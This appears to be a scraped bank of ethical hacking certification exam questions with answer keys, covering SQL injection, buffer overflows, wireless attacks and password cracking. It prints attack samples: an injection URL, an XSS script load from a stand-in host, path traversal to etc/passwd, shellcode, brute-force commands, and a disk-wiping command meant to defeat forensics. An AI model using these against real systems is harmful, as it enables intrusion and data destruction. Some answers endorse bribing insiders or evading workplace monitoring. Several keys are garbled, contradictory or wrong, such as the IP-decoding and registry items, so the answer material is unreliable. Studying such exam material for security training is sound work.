Given the follow extract from the snort log on a honey pot, what do you infer from the attack? A. A new user id was createdB. The exploit was not successfulC. The exploit was successfulD. A new port was opened.
B. The exploit was not successful. The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.
You receive an e-mail with the following text message."Microsoft and AOL today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allowshackers to access your computer. Delete the file immediately. Please also pass this message toall your friends and colleagues as soon as possible."You launch your antivirus software and scan the suspicious looking file hidserv.exe located inc:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service."What category of virus is this?A. Spooky VirusB. Virus hoaxC. Polymorphic VirusD. Stealth Virus
B. Virus hoax.
Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice'smachine. From the command prompt, she types the following command.For /f okens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:dministrator?%%aWhat is Eve trying to do?A. Eve is trying to carry out a password crack for user AdministratorB. Eve is trying to escalate privilege of the null user to that of AdministratorC. Eve is trying to connect asan user with Administrator privilegesD. Eve is trying to enumerate all users with Administrative privileges
A. Eve is trying to carry out a password crack for user Administrator.Eve is trying to get a successful login using the name Administrator and passwords from the file hackfile.txt
Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at http://www.masonins.com/. Joseph uses his laptop computer regularly for websiteadministration. One night, an associate notifies Joseph that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message ''H@cker Mess@ge: Y0u @re De@d! Fre@ks! ''Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph logged off the company's internal LAN and accessed the company Web site using his dialup ISP connection. He browsed to http://www.masonins.com/ and saw the following on the web page:H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d!Fre@ksmailto:Fre@ks!After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internalnetwork, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire againstthe entire Web site, and found that every system file and all the Web content on the server wereintact.How did the attacker accomplish this hack?A. ARP spoofingB. Routing table injectionC. SQL injectionD. DNS poisoning
D. DNS PoisoningExternal calls for the Web site has been redirected to another server by a successful DNSpoisoning.
Stephanie works as a records clerk in a large office building in downtown Chicago.On Monday,she went to a mandatory security awareness class (Security5) put on by her company's ITdepartment.During the class, the IT department informed all employees that everyone's Internetactivity was thenceforth going to be monitored.Stephanie is worried that her Internet activity might give her supervisor reason to write her up, orworse get her fired.Stephanie's daily work duties only consume about four hours of her time, soshe usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internetbut definitely does not want to get fired for it.What should Stephanie use so that she does not get in trouble for surfing the Internet?A. Stealth FirefoxB. Cookie DisablerC. Stealth AnonymizerD. Stealth IE
C. Stealth Anonymizer
Identify SQL injection attack from the HTTP requests shown below:A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999B.http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00C.http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3eD. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
B. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00The correct answer contains the code to alter the usertable in order to change thepassword for user smith to hAx0r
Liza has forgotten her password to an online bookstore. The web application asks her to key in heremail so that they can send her the password. Liza enters her email liza@yahoo.com'. Theapplication displays server error. What is wrong with the web application?A. The email is not validB. User input is not sanitizedC. The ISP connection is not reliableD. The web server may be down
B. User input is not sanitized All input from web browsers, such as user data from HTML forms and cookies, must be stripped ofspecial characters and HTML tags as described in the following CERT advisories:http://www.cert.org/advisories/CA-1997-25.htmlhttp://www.cert.org/advisories/CA-2000-02.html
You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create anexecutable file chess.exe. This Trojan when executed on the victim machine, scans the entiresystem (A. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoB. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StartC. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\DesktopD. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_CURRENT_USER\SOFTWARE\Microsoft|Windows|CurrentVersion|DesktopHKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when the MACHINE is rebooted
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventionalhacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate anotherwise impenetrable system.How would you proceed?A. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniquesB. Look for "zero-day" exploits at various underground hacker websites in Russia and Chinaand buy the necessary exploits from these hackers and target the bank's networkC. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information.
You come across a WiFi network in your neighborhood. You pull up your hardware WiFi snifferfrom your car and tune into 802.11a network to sniff the Wireless traffic for sensitive data. Whatfrequency will you tune the Wireless hardware device to?A. 900MHz-2.462 GHzB. 5.15-5.825 GHzC. 2.323-2.462 GHzD. 2.412-2.462 GHz
B. 5.15 - 5.825 GHz
Which programming language is NOT vulnerable to buffer overflow attacks?A. Assembly LanguageB. C++C. ActiveXD. Java
D. JavaPerl and Java have boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some applications require.
SNMP is a protocol used to query hosts, servers, and devices about performance or health statusdata. Hackers have used this protocol for a long time to gather great amount of information aboutremote hosts. Which of the following features makes this possible?A. It uses TCP as the underlying protocolB. It uses a community string sent as clear textC. It is susceptible to sniffingD. It is used by ALL devices on the market
B. It uses a community string sent as clear textSNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use itand it can be disabled on most of the devices that does use it. However SNMP is susceptible to sniffing and the community string (which can be said acts as a password) is sent in clear text
Fingerprinting an Operating System helps a cracker because:A. It doesn't depend on the patches that have been applied to fix existing security holesB. It opens a security-delayed window based on the port being scannedC. It informs the cracker of which vulnerabilities he may be able to exploit on your systemD. It defines exactly what software you have installed
C. It informs the cracker what vulnerabilities he may be able to exploit on your system. When a cracker knows what OS and services you use, it allows him to target his exploits to your system, saving time and decreasing the chances of detection.
A program that defends against a port scanner will attempt to:A. Log a violation and recommend use of security-auditing toolsB. Update a firewall rule in real time to prevent the port scan from being completedC. Sends back bogus data to the port scannerD. Limit access by the scanning system to publicly available ports only
B. Update a firewall rule in real time to prevent the port scan from being completed.
Statistics from cert.org and other leading security organizations have clearly shown a steadyincrease in the number of hacking incidents against companies. What do you think is the mainreason we have seen such a huge increase in hacking attempts over the past years?A. Increase in processing powerB. It is getting harder to hack and more challenging for non technical peopleC. The ease of getting hacker tools on the InternetD. New TCPIP stack features are constantly being added
C. The ease of getting hacker tools on teh Interwebz. Script kiddez!
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network hasbeen breached by an outside attacker.After performing routine maintenance on his servers, hediscovers numerous remote tools were installed that no one claims to have knowledge of in hisdepartment.Gerald logs onto the management console for his IDS and discovers an unknown IP address thatscanned his network constantly for a week and was able to access his network through a highlevelport that was not closed.Gerald traces the IP address he found in the IDS log to a proxyserver in Brazil.Gerald calls the company that owns the proxy server and after searching through their logs, theytrace the source to another proxy server in Switzerland.Gerald calls the company in Switzerlandthat owns the proxy server and after scanning through the logs again, they trace the source backto a proxy server in China.What tool has Gerald's attacker used to cover their tracks?A. IASB. CheopsC. ISAD. Tor
D. TorTor is a network of virtual tunnels that allows people and groups to improve their privacy andsecurity on the Internet. It also enables software developers to create new communication toolswith built-in privacy features. It provides the foundation for a range of applications that alloworganizations and individuals to share information over public networks without compromising theirprivacy. Individuals can use it to keep remote Websites from tracking them and their familymembers. They can also use it to connect to resources such as news sites or instant messagingservices that are blocked by their local Internet service providers (ISPs).
You want to carry out session hijacking on a remote server. The server and the client arecommunicating via TCP after a successful TCP three-way handshake. The server has justreceived packet #120 from the client. The client has a receive window of 200 and the server has areceive window of 250. What is the range of packet sequence numbers that would be accepted bythe server?A. 121-371B. 120-370C. 200-250D. 121-231E. 120-321
A. 121-371.Package number 120 has already been received by the server, and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250)
Henry is an attacker and wants to gain control of a system and use it to flood a target system withrequests, so as to prevent legitimate users from gaining access. What type of attack is Henryusing?A. Henry is using a denial of service attack which is a valid threat used by an attackerB. Henry uses poorly designed input validation routines to create or alter commands to gainaccess to unintended data or execute commandsC. Henry is executing commands or viewing data outside the intended target pathD. Henry is taking advantage of an incorrect configuration that leads to access with higher-thanexpectedprivilege
A. Henry is using a DoS attack. Henry's intent is to perform a DoS attack against his target, or possibly a DDoS. He uses systems other than his own to perform the attack to cover his tracks, and to get more punch in the DoS.
Steve scans the network for SNMP enabled devices. Which port number should Steve scan?A. 161B. 169C. 150D. 69
A. 161. The default port for SNMP is 161. Port 69 us used for TFTP, 150 is used for SQL-NET, and 169 is for SEND.
The GET method should never be used when sensitive data such as credit card is being sent to aCGI program. This is because any GET command will appear in the URL, and will be logged byany servers. For example, let's say that you've entered your credit card information into a form thatuses the GET method. The URL may appear like this:https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234The GET method appends the credit card number to the URL. This means that anyone withaccess to a server log will be able to obtain this information.How would you protect from this type of attack?A. Replace the GET with POST method when sending dataB. Encrypt the data before you send using GET methodC. Never include sensitive information in a scriptD. Use HTTPS SSLv3 to send the data instead of plain HTTPS
A. Replace the GET with POST method when sending data. If the method is "get," the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-form-urlencoded content type. The user agent then traverses the link to this URL. If the method is "post" the user agent conducts an HTTP post transaction using the value of the action attribute and a message created according to the content type specified by the enctype attribute.
What is the command used to create a binary log file using tcpdump?A. tcpdump -r logB. tcpdump -l /var/log/C. tcpdump -vde logD. tcpdump -w ./log
D. tcpdump - ./log
Jonathan being a keen administrator has followed all of the best practices he could find onsecuring his Windows Server. He renamed the Administrator account to a new name that cannotbe easily guessed but there remain people who attempt to compromise his newly renamedadministrator account. How can a remote attacker decipher the name of the administrator accountif it has been renamed?A. The attacker used the sid2user programB. The attacker guessed the new nameC. The attacker used the user2sid programD. The attacker used NMAP with the V switch
C. The attacker used the user2sid program.User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or aremote machine Sid2user.exe can then be used to retrieve the names of all the user accounts andmore. These utilities do not exploit a bug but call the functions LookupAccountName andLookupAccountSid respectively. What is more these can be called against a remote machine without providing logon credentials save those needed for a null session connection.
Take a look at the following attack on a Web Server using obstructed URL: http://www.example.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64This request is made up of:.%2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../.%65%74%63 = etc.%2f = /.%70%61%73%73%77%64 = passwd.How would you protect from these attacks?A. Configure the Web Server to deny requests involving "hex encoded" charactersB. Use SSL authentication on Web ServersC. Create rules in IDS to alert on strange Unicode requestsD. Enable Active Scripts Detection at the firewall and routers
C. Create rules in IDS to alert on strange Unicode requests. This is a typical Unicode atttack. By configuring you IDS to trigger on strange Unicode requests, you can protect your web-server from this type of attacks.
Steven the hacker realizes the network administrator of Acme Corporation is using syskey inWindows 2000 Server to protect his resources in the organization. Syskey independently encryptsthe hashes so that physical access to the server, tapes, or ERDs is only first step to cracking thepasswords. Steven must break through the encryption used by syskey before he can attempt touse brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker"targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. Heneeds to configure the encryption level before he can launch the attack. How many bits doesSyskey use for encryption?A. 64-bit encryptionB. 128-bit encryptionC. 40-bit encryptionD. 256-bit encryption
B. 128 bit encryption. SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
A simple compiler technique used by programmers is to add a terminator 'canary word' containingfour letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations areterminated. If the canary word has been altered when the function returns, and the programresponds by emitting an intruder alert into syslog, and then halts what does it indicate?A. A buffer overflow attack has been attemptedB. A buffer overflow attack has already occurredC. The system has crashedD. An intrusion detection system has been triggeredE. A firewall has been breached and this is logged
A. A buffer overflow attack has been attempted. Terminator canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF and -1. The undesirable result is that the canary is known.
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;What attack is being depicted here?A. Cookie StealingB. Parameter ManipulationC. Session HijackingD. Cross Site Scripting
B. Parameter manipulationCookies are the preferred method to maintain state in the stateless HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure, cna be modified by the client and sent to the server with URL requests. Therefore, any malicious user can modify cookie content to his advantage.
Given the following extract from the snort log on a honeypot, what do you infer from the attack? A. A new user id was createdB. The exploit was not successfulC. The exploit was successfulD. A new port was opened.
B. The attacker submits a PASS to the honeypot, and receives a login incorrect before disconnecting.
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.cchar shellcode[] ="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0""\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d""\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73""\x68";What is the hexadecimal value of NOP instruction?A. 0x60B. 0x70C. 0x80D. 0x90
D. 0x90
Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easytask for hackers. They use tools such as arhontus or brutus to break into remote servers.CEH# ./rpaRemote Password Assassin V 1.0Roses Labs / w00w00Usage: ./rpa (options)Options:-l : Login file to use.-s : Use the same login.-c : Password file to use.-r : Attack FlowPoint Router.-t : Attack Telnet Port.-f : Attack FTP Port.-p : Attack POP Port.CEH# ./rpa 10.0.0.34 -t -f -c passwords.txt -s linksysA command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously witha list of passwords and a single login name: linksys. Many FTP-specific password-guessing toolsare also available from major security sites.What defensive measures will you take to protect your network from these attacks?A. Never leave a default passwordB. Never use a password related to your hobbies, pets, relatives, or date of birth.C. Never use a password that can be found in a dictionaryD. Use a word that has more than 21 characters from a dictionary as the passwordE. Never use a password related to the hostname, domain name, or anything else that can be found with whois
A. Never leave a default passwordB. Never use a password related to your hobbies, pets, relatives, or date of birth.C. Never use a password that can be found in a dictionaryE. Never use a password related to the hostname, domain name, or anything else that can be found with whois
Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routinesto create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?A. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expectedprivilege of the databaseB. Jimmy can submit user input that executes an operating system command to compromise atarget systemC. Jimmy can utilize this particular database threat that is an SQL injection technique to penetratea target systemD. Jimmy can gain control of system to flood the target system with requests, preventing legitimateusers from gaining access
C. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system. SQL injection is a security vulnerability that occurs in the database layer of an application. Thevulnerability is present when user input is either incorrectly filtered for string literal escapecharacters embedded in SQL statements or user input is not strongly typed and therebyunexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Windows LAN Manager (LM) hashes are known to be weak. Select all of the following that areweaknesses of LM?A. Hashes are sent in clear over the networkB. Effective length is 7 charactersC. Makes use of only 32-bit encryptionD. Converts password to uppercase
A. Hashes are sent in clear over the networkB. Effective length is 7 charactersD. Converts password to uppercaseThe LM hash is computed as follows. 1. The user's password as an OEM string is converted touppercase. 2. This password is either null-padded or truncated to 14 bytes. 3. The "fixed-length"password is split into two 7-byte halves. 4. These values are used to create two DES keys, onefrom each 7-byte half. 5. Each of these keys is used to DES-encrypt the constant ASCII string "KGS!@#$% ", resulting in two 8-byte ciphertext values. 6. These two ciphertext values areconcatenated to form a 16-byte value, which is the LM hash.The hashes themselves are sent in clear text over the network instead of sending the password in clear text.
Which of the following represents the initial two commands that an IRC client sends to join an IRCnetwork?A. LOGIN, USERB. USER, PASSC. USER, NICKD. LOGIN, NICK
C. USER, NICKA "PASS" command is not requred for either client or server connection to be registered, but it must precede the server message or the latter of the NICK/USER combination. (RFC 1459)
You are the senior security analyst for Hammerstreet Inc. located in Florida. Hammerstreet'sprimary product line revolves around high tech weapons developed for the US Army. For thisreason, your position as the head of logical security is vital in ensuring that no corporate secretsare leaked. You are in the process of purchasing an IPS device for the network, so currently youonly have an older IDS appliance sitting on the network.On Monday morning when you get into work, you are alerted by your IDS that an outside IP isscanning numerous ports on your network. You are then alerted by the IDS that it is gettingflooded by malformed packets to some commonly used ports such as ports 80, 135, 445, and 53.You logon to the IDS' management console and run TCP dump to a text file for a time range of 10minutes. You open the file initially but it is very difficult to read. You eed a utility that can group allthe TCP packets in the file by their timestamps, to get a closer look at how much data is beingsent to your network in a given amount of time.What utility could you use to examine the TCP dump file closer and make it more readable?A. TcpsliceB. WinPcapC. TCPdumpD. IDSwakeup
A. Tcpslice
The FIN flag is set and sent from host A to host B when host A has no more data to transmit(Closing a TCP connection). This flag releases the connection resources. However, host A cancontinue to receive data as long as the SYN sequence numbers of transmitted packets from hostB are lower than the packet segment containing the set FIN flag.A. TrueB. False
A. TrueFor sequence number purposes, the SYN is considered to occur before the first actual data octet of the segment in which it occurs, while the FIN is considered to occur after the last actual data octet in a segment in which it occurred. So, packets received out of order will still be accepted.
Steven works as a security consultant and frequently performs penetration tests for Fortune 500companies.Steven runs external and internal tests and then creates reports to show thecompanies where their weak areas are.Steven always signs a non-disclosure agreement beforeperforming his tests.What would Steven be considered?A. Blackhat HackerB. Whitehat HackerC. Grayhat HackerD. Bluehat Hacker
B. Whitehat hacker.
What is the purpose of firewalking?A. It's a technique used to discover what rules are configured on a gatewayB. It's a technique used to discover interface in promiscuous modeC. It's a technique used to map routers on a network linkD. It's a technique used to discover Wireless network on foot
A. It's a technique used to discover what rules are configured on a gateway. Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map "open" or "pass-through" ports on a gateway. Moreover, it can determine whether packets with various control information can pass through a given gateway.
Daryl is a network administrator working for Dayton Technologies. Since Daryl's background is inweb application development, many of the programs and applications his company uses are webbased.Daryl sets up a simple forms-based logon screen for all the applications he creates, sothey are secure.The problem Daryl is having, is that his users are forgetting their passwords quite often andsometimes he does not have the time to get into his applications and change the passwords forthem. Daryl wants a tool or program that can monitor web-based passwords and notify him when a password has been changed so he can use that tool whenever a user calls him and he can give them their password right then.What tool would work best for Daryl's needs?A. WinHttrackB. John the RipperC. L0phtCrackD. Password Sniffer
D. Password Sniffer.L0phtCrack is a PW auditing and recovery app (now called LC5), originally produced by Mudge from L0pht industries. It is used to test PW strength, and sometimes to recover lost MS Windows passwords.John the Ripper is one of hte most popular password testing.breaking programs, as it combines a number of password crackers into one package, autodetects PW hash types, and includes a customizable cracker. It can be run against various encrypted password formats, including several crypt PW hash types. WinHttrack is an offlien browser.A PW sniffer would give Daryl the PWs when they are changed as it is a web-based authentication over a simple form.It would be more correct to give the users new PWs instead of keeping a copy of the PWs in clear text.
How many bits encryption does SHA-1 use?A. 256 bitsB. 160 bitsC. 128 bitsD. 64 bits
B. 160 bits SHA-1 (as well as SHA-0) produces a 160 bit digest from a message with a maximum length of 261-1 bits and is based on principles similar to Rivest's in the design of the MD4 and MD5 algorithms.
You are having trouble obtaining accurate results while conducting a port scan against a targetnetwork. You check for the presence of any security devices between you and the target system.When both stealth and connect scans do not work, you decide to perform a NULL scan withNMAP. The first few systems scanned shows all ports open. Which one of the followingstatements is most probably true?A. The systems have all ports openB. The systems are running a host based IDSC. The systems are Web ServersD. The systems are running Windows
D. The systems are running Windows. The null scan turns off all flags, creating a lack of TCP flags that should never occur in the real world. If the port is closed, a RST frame should be returned and a null scan to an open port results in no response. Unfortunately (as usual) Microsoft decided to completely ignore the standard and do things their won way... Thus, this scan type will not work against systems running Windows as they choose not to respond at all. This is a good way to distinguish that the system being scanned is running Windows.
Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the ITdepartment of his company installed a wireless network throughout the building. The problem is, isthat they are only going to make it available to upper management and the IT department.Most employees don't have a problem with this since they have no need for wireless networking,but Jeffery would really like to use wireless since he has a personal laptop that he works from asmuch as he can.Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turneddown. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to getaccess to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wirelessnetworks available. fter about an hour of trying to figure it out, Jeffery cannot get on the company'swireless network. Discouraged, Jeffery leaves the office and goes home.The next day, Jeffery calls his friend who works with computers. His friend suggests that his ITdepartment might have turned off SSID broadcasting, and that is why he could not see anywireless networks.How would Jeffrey access the wireless network?A. Jam the wireless signal by launching denial of service attackB. Attempt to connect using wireless device default SSIDsC. Run WEPCrack tool and brute force the SSID hashesD. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintextA. Jam the wireless signal by launching denial of service attackB. Attempt to connect using wireless device default SSIDsC. Run WEPCrack tool and brute force the SSID hashesD. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext
D. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext.
Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks?A. strsock()B. strcpy()C. streadd()D. strcat()
B. strcpy()C. streadd()D. strcat()When hunting buffer overflows, the first thing to look for is functions which write into arrays without any way to know the amount of space available. If you get to define the function, you can pass a length parameter in, or ensure that every array you ever pass to it is at least as big as the hardcoded maximum amount it will write. If you're using a function someone else (like, say, the compiler vendor) has provided then avoiding functions like gets(), which take some amount of data over which you have no control and stuff it into arrays they can never know the size of, is a good start. Make sure that functions like the str ...() family which expect NUL-terminated strings actuallyget them - store a '\0' in the last element of each array involved just before you call the function, if necessary. Strscock( ) is not a valid C/C++ function.
Ethernet switches can be adversely affected by rapidly bombarding them with spoofed ARPresponses. he port to MAC address table (CAM TABLE) overflows on the switch, and rather thanfailing completely, moves into broadcast mode, then the hacker can sniff all of the packets on thenetwork.Which of the following tool achieves this?A. ./sniffofB. ./dsniffC. ./switchsnarfD. ./macof
D. ./macofmacof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing.)
What does this symbol mean:A. WPA encrypted access pointB. WEP encrypted access pointC. Open access pointD. Closed access point
C. Open access point. This is a warchalking symbol for an open node (open circle) with the SSID tsunami, and the bandwidth is 2.0 Mb/s
On wireless networks, a SSID is used to identify the network. Why are SSID not considered to bea good security mechanism to protect a wireless network?A. The SSID is the same as the MAC address for all vendorsB. The SSID is only 32 bits in lengthC. The SSID is to identify a station, not a networkD. The SSID is transmitted in clear text
D. The SSID is transmitted in clear text. The SSID is constructed to identify a network. It is not the same as a MAC address, and SSIDs conssit of a maximum of 32 alphanumeric characters.
You are trying to compromise a Linux machine and steal the password hashes for cracking withpassword brute forcing program. Where is the password file kept in Linux?A. /etc/passwdB. /bin/shadowC. /bin/passwordD. /etc/shadow
D. /etc/shadowThe /etc/shadow file stores actual passwords in encrypted format for user accounts iwht additional properties related to user passwords. I.e. it stores secure user account information. All fields are separated by a colon (:). It contains one entry per line for each user listed in /etc/passwd file.
You are the security administrator for a large online auction company based out of LosAngeles.After getting your ENSA CERTIFICATION last year, you have steadily been fortifying yournetwork's security including training, OS hardening, and network security.One of the last thingsyou just changed for security reasons was to modify all the built-in administrator accounts on thelocal computers of PCs and in Active Directory.After thorough testing, you found that no servicesor programs were affected by the name changes.Your company undergoes an outside security audit by a consulting company, and they said thateven though all the administrator account names were changed, the accounts could still be usedby a clever hacker to gain unauthorized access.You argue with the auditors and say that is notpossible, so they use a tool and show you how easy it is to utilize the administrator account eventhough its name was changed.What tool did the auditors use?A. Sid2userB. User2sidC. FingerprintD. GetAcct
A.. Sid2userUser2Sid.exe can retrieve a SID from the SAM from the local or a remote machine. Sid2User.exe can then be used to retrieve the names of all the user accounts and more.
In order to attack a wireless network, you put up an access point and override the signal of the realaccess point. As users send authentication data, you are able to capture it. What kind of attack isthis?A. WEP attackB. Drive by hackingC. Unauthorized access point attackD. Rogue access point attack
D. Rogue Access Point attack.The definition of a rogue access point is: 1) A wireless access point installed by an employee without the consent of the IT department. Withou the proper security configuration, users have exposed their company's network to the outside world. 2) An access point set up by an attacker outside a facility with a wireless network. Also called an "evil twin" the rogue access point picks up beacons (signals that advertise its presence) from the company's legitimate access point, and transmits identical beacons, which some client machines inside the building associate with.
A distributed port scan operates by:A. Using denial-of-service software against a range of TCP portsB. Having multiple computers each scan a small number of ports, then correlating the resultsC. Blocking access to the targeted host by each of the distributed scanning clientsD. Blocking access to the scanning clients by the targeted host
B. Having multiple computers each scan a small number of ports, then correlating the results.
You are the security administrator for a large network. You want to prevent attackers from runningany sort of traceroute into your DMZ and discovering the internal structure of publicly accessibleareas of the network. How can you achieve this?A. There is no way to completely block tracerouting into this areaB. Block ICMP at the firewallC. Block TCP at the firewallD. Block UDP at the firewall
A. There is no way to completely block tracerouting into this area. If you create rules that prevent attackers from performing tracerouts into your DMZ, then you'll also prevent anyone from accessing the DMZ from outside the company network, and in that case, it's not a DMZ that you have.
You receive an e-mail with the below message:Hello Steve,We are having technical difficulty in restoring user database records after the recent blackout.Your account data is corrupted. Please logon on to SuperEmailServices.com and change yourpassword.http://www.superemailservices.com%40c3405906949/support/logon.htmIf you do not reset your password within 7 days, your account will be permanently disabled locking you out from using our e-mail services.Sincerely,Technical SupportuperEmailServicesFrom this e-mail you suspect that some hacker sent this message since you have been using their e-mail services for the last 2 years and they never have sent out an e-mail such as this. You also observe the URL in the message and want to confirm your suspicion about 3405906949, which looks like a base10 number. You enter the following at the Windows 2003 command prompt:ping 3405906949You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?A. 199.23.43.4B. 203.2.4.5C. 192.34.5.9D. 10.0.3.4
A. 199.23.43.4B. 203.2.4.50x stands for hexadecimal and DE=222, AD=173, BE=190 and EF=239
Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into adetection engine and rely on the pattern matching and/or statistical analysis to determine what ismalicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyzetraffic the host would otherwise discard. Which of the following tools allows an attacker tointentionally craft packets to confuse pattern-matching NIDS systems, while still being correctlyassembled by the host TCP/IP stack to render the attack payload?A. DefragB. FragrouteC. TcpfragD. Tcpdump
B. FragrouteFragroute intercepts, modifies and rewrites egress traffic destined for a specific host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls and basic TCP/IP stack behavior.
Shauna is the Senior Security Analyst for the Department of Defense, in charge of all aspects ofthe DoD's internal network security.As one would expect, the DoD is constantly probed andscanned by outside IP addresses, trying to find an entry into the network.Shauna leads a largeteam of junior security analysts that make sure all entry points are closed off, unless that entrypoint must be kept open for business purposes.If something must be kept open, Shauna and heremployees' duty is to make sure that hole is not exploited by outside attackers.One way that this is accomplished, is to not use traditional ports for normally used services.Allemployees and outside contractors that must obtain remote access for work, are notified of thenon-standard ports, and thus are able to gain access.The traditional ports used for services likehttp are actually kept open, but they are redirected to a secure logical area and logged.These logsenable Shauna and her team to analyze who is trying to obtain unauthorized access, andprosecute if necessary.What technique is Shauna using here?A. HoneypotB. FirewalkingC. TunnelingD. Obfuscation
A. Honeypot
Mason is the network administrator at Machine Systems, Inc. He has been pushed aside in promotions due to office politics. He wants to take revenge on his boss, Matthew Smith. Being adisgruntled employee, Mason sneaks into Matthew's office one night and boots his boss'scomputer with the Knoppix CD-ROM and intends to erase the contents of his boss's hard disk, including the partition table, without leaving any trace of his action. He intends to make the hard disk data unrecoverable even to a forensics team.Which of the following commands should Mason run in Knoppix to permanently erase the data?A. $ delete -fik /dev/hda1B. $ wipe -fik /dev/hda1C. $ erase -fik /dev/hda1D. $ secdel -fik /dev/hda1
B. $ wipe -fik /dev/hda1
Interpret the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13.1351--> 172.16.1.107:53A. A buffer overflow attemptB. A DNS zone transferC. Data being retrieved from 63.226.81.13D. An IDS evasion technique.
